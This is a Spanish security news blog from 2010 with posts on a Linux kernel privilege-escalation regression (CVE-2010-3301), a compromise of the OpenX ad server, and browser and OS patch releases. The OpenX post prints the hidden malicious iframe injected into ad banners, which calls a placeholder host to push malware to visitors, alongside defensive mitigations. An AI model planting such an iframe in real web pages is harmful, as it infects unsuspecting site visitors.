jueves, 23 de septiembre de 2010

Error de regresión en el kernel Linux


El investigador de seguridad Ben Hawkes se hallaba diseccionando el modo de compatibilidad del kernel Linux de 64 bits para aplicaciones de 32 bits cuando dio con algo que llamó su atención:

En el 2007 fue publicada una vulnerabilidad que permitía elevar privilegios en el kernel Linux de 64 bits. El problema residía en el archivo 'arch/x86_64/ia32/ia32entry.S', dentro de un procedimiento para emular las llamadas de la arquitectura de 32 bits.

Dicho procedimiento usa el registro eax como índice a una tabla donde están las llamadas del sistema correspondientes a IA32 y comprueba que eax está dentro de los límites de la tabla. Si es así llama a la macro IA32_ARG_FIXUP que realizará una conversión de registros de 64 bits a registros de 32.

Finalmente se realiza la llamada a través de ia32_sys_call_table pero usando el registro 'rax' completo y sin comprobar. Esto permite, si podemos controlar 'rax', efectuar llamadas a direcciones fuera de la tabla de llamadas y con privilegios del sistema (elevación de privilegios).

Dicho fallo, originalmente descubierto por Wojciech Purczynski,  fue corregido añadiendo la macro LOAD_ARGS32 para cargar de manera segura los registros previniendo su explotación. En su día fue publicado el exploit correspondiente y se asignó el CVE-2007-4573 a la vulnerabilidad.

Lo que Ben observó fue que en las nuevas versiones del kernel, los desarroladores habían eliminado una linea concreta de la macro LOAD_ARGS32: "movl \offset+72(%rsp),%eax".

Curiosamente se trata de la que efectuaba una asignación segura del valor de 'eax'. Esto puede verse en el commit correspondiente del repositorio del kernel.

De nuevo la vulnerabilidad estaba viva. Ben se lo comunicó a Robert Swiecki, quien creo el exploit original y el cual sólo tuvo que modificarlo para que fuese funcional una vez más.

El fallo ha sido nuevamente parcheado y asignado el CVE-2010-3301.

Más información:


Linux Compat Vulns
Isec 0025 Syscall Emulation
CVE-2010-3301 kernel: IA32 System Call Entry Point Vulnerability
domingo, 12 de septiembre de 2010

Malware a través de OpenX y 2 soluciones para evitarlo

Como muchos se habrán podido dar cuenta, hace unos días al visitar algunos de los blogs de Medios y Redes diversos navegadores de Internet mostraban una advertencia sobre que el sitio web en cuestión alojaba software malicioso. Este problema ya fue solucionado, y tal como se explicó en el blog corporativo, se debió a que OpenX, la plataforma con la que se gestionan campañas de publicidad de la red, fue infectada con un código malicioso.



Existe una vulnerabilidad en algunas versiones de OpenX 2.8.x que posibilita inyectar código en la base de datos de las campañas publicitarias. En este caso, se detectó que en el campo “append” fue insertado el siguiente iframe:


“<iframe src="http://sitio-web-malicioso/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>”


Este código se sirve junto con los anuncios de OpenX, y tiene la finalidad de descargar malware en el equipo del usuario. Lo más recomendable es actualizar a la última versión de OpenX, la cual al parecer cierra la vulnerabilidad, pero si por cualquier motivo no les es posible, pueden recurrir a estas dos soluciones:


1.Verificar constantemente que el campo “append” no tenga código malicioso. No es algo muy efectivo si se hace de forma manual, pero se puede crear un script en cronjob que verifique cada cierto tiempo dicho campo y que nos alerte en caso de que encuentre código malicioso, de este modo podremos eliminarlo lo más pronto posible de la base de datos.


2.En caso de que no se utilice, inhabilitar el campo “append”. Para esto únicamente debemos editar el archivo “/www/delivery/ajs.php” de nuestra instalación de OpenX y en la línea 3227 reemplazar el fragmento de código “!empty($aBanner['append']) ? $aBanner['append'] : ”” por “$append=”";“.


Esto no corrige la vulnerabilidad, pero por lo menos evita que se siga sirviendo el código malicioso a través de los anuncios de publicidad. En los foros de OpenX se puede ver que muchos usuarios se han visto afectados por este problema, así que si usan esta herramienta les recomendamos que tomen sus precauciones.

Mozilla corrige múltiples fallas de seguridad en Firefox


Casi al mismo tiempo que Safari, Mozilla ha lanzado una nueva actualización de Firefox para solucionar múltiples vulnerabilidades, entre ellas el problema relacionado a la carga de librerías DLL que afecta a numerosas aplicaciones para Windows y que, precisamente, Safari también solucionó en su última entrega.




Firefox 3.6.9 se encarga de cerrar 15 vulnerabilidades de seguridad, la mayoría han sido catalogadas por el equipo de Mozilla como “críticas” y pueden ser aprovechadas para causar el cuelgue del navegador y ejecutar código arbitrario.


Además de dichas correcciones, se ha implementado soporte para “X-Frame-Options“, lo cual es utilizado para evitar los llamados ataques clickjacking que tan comunes se han vuelto. Navegadores como Internet Explorer 8, Safari, Chrome y Opera ya soportaban esta característica, y Firefox era el que faltaba.


La nueva actualización de Firefox ya se puede descargar desde el sitio web de Mozilla. Si todavía no les aparece la notificación para actualizar de forma automática, sólo hay que dirigirse al menú “Ayuda” – “Buscar Actualizaciones”.
domingo, 5 de septiembre de 2010

El equipo de Google ha lanzado la versión 6.0.472.53 de su navegador Chrome. Esta actualización, además de incluir nuevas características y mejoras en cuanto a velocidad, se encarga de solucionar 17 de vulnerabilidades de seguridad.



De momento Google ha preferido mantener en privado los detalles de las fallas corregidas, pero cabe destacar que casi la mitad han sido catalogadas como de prioridad “alta”. La actualización se ha lanzado en el canal ‘estable’ y ‘beta’ de Google Chrome y afecta a los usuarios de Windows, Mac OS X y Linux.

Dichas vulnerabilidades le han “costado” a Google $4,337 dólares, pues fue lo que entregó en total como parte de su famoso programa de recompensas.

Google Chrome 6.0 ya está disponible en su página web oficial, así que les recomendamos descargarlo cuanto antes. También pueden actualizar desde el navegador haciendo clic en herramientas, ayuda y acerca de Google Chrome.

Apple soluciona múltiples fallos de seguridad en Mac OS X


Apple ha lanzado para los usuarios de Mac OS X 10.5 y 10.6 la Actualización de Seguridad 2010-05. Esta actualización soluciona múltiples vulnerabilidades de seguridad que afectan al sistema y algunos componentes de terceros.


Entre las correcciones, se incluyen vulnerabilidades graves que permite ejecutar código malicioso al abrir un documento, una imagen .PNG o un archivo PDF que haya sido maliciosamente modificado. También se ha actualizado la versión de PHP y ClamAV para solventar distintos agujeros de ejecución de código.


La Actualización de Seguridad 2010-05 se puede descargar desde la página web de Apple o por medio de “Actualización de Software” de OS X. Es importante que los usuarios de Leopard y Snow Leopard actualicen lo más pronto posible.

Apple prepara un parche para la vulnerabilidad Jailbreak de iOS




Tal parece que en breve los usuarios de iPhone, iPod Touch y iPad recibirán una nueva actualización de iOS. Sin embargo, no será para agregar novedades, sino para corregir la grave vulnerabilidad que permite la ejecución de código.



Natalie Kerris, portavoz de Apple, dijo a USAToday que ya tienen terminado un parche para corregir la vulnerabilidad, y aunque todavía no han determinado una fecha para su lanzamiento, se espera que esté disponible dentro de unos días.


La vulnerabilidad en cuestión, que se debe a un error en la forma en que el sistema gestiona las fuentes CFF, actualmente está siendo aprovechada para aplicar el famoso “Jailbreak” en iOS, que no es otra cosa que la posibilidad de ejecutar código no autorizado de Apple. Sin embargo, también podría ser aprovechada para muchos otros fines, como ejecutar código malicioso en el sistema operativo tan sólo con abrir un archivo PDF o visitar una página web.


Se trata de una problema de seguridad muy grave, pero por desgracia, ha llamado más la atención la posibilidad de hacer Jailbreak que el problema como tal.

Actualización del kernel para SuSE Linux Enterprise 10



SuSE ha publicado la actualización del kernel para SuSE Linux Enterprise Server y Desktop en su versión 10 SP3 en la que se corrigen dos vulnerabilidades de denegación de servicio.


Uno de los problemas corregidos en que la pila de procesos puede crecer hasta sobreescribir otras áreas mapeadas, esto podría conllevar la terminación del proceso.


Un segundo problema, consiste en una denegación de servicio del servidor NFSv4 ante peticiones específicamente construidas.


Se recomienda actualizar a la última versión del kernel, disponible a través de la herramienta automática YaST.

Más información:


[security-announce] SUSE Security Announcement: kernel (SUSE-SA:2010:038)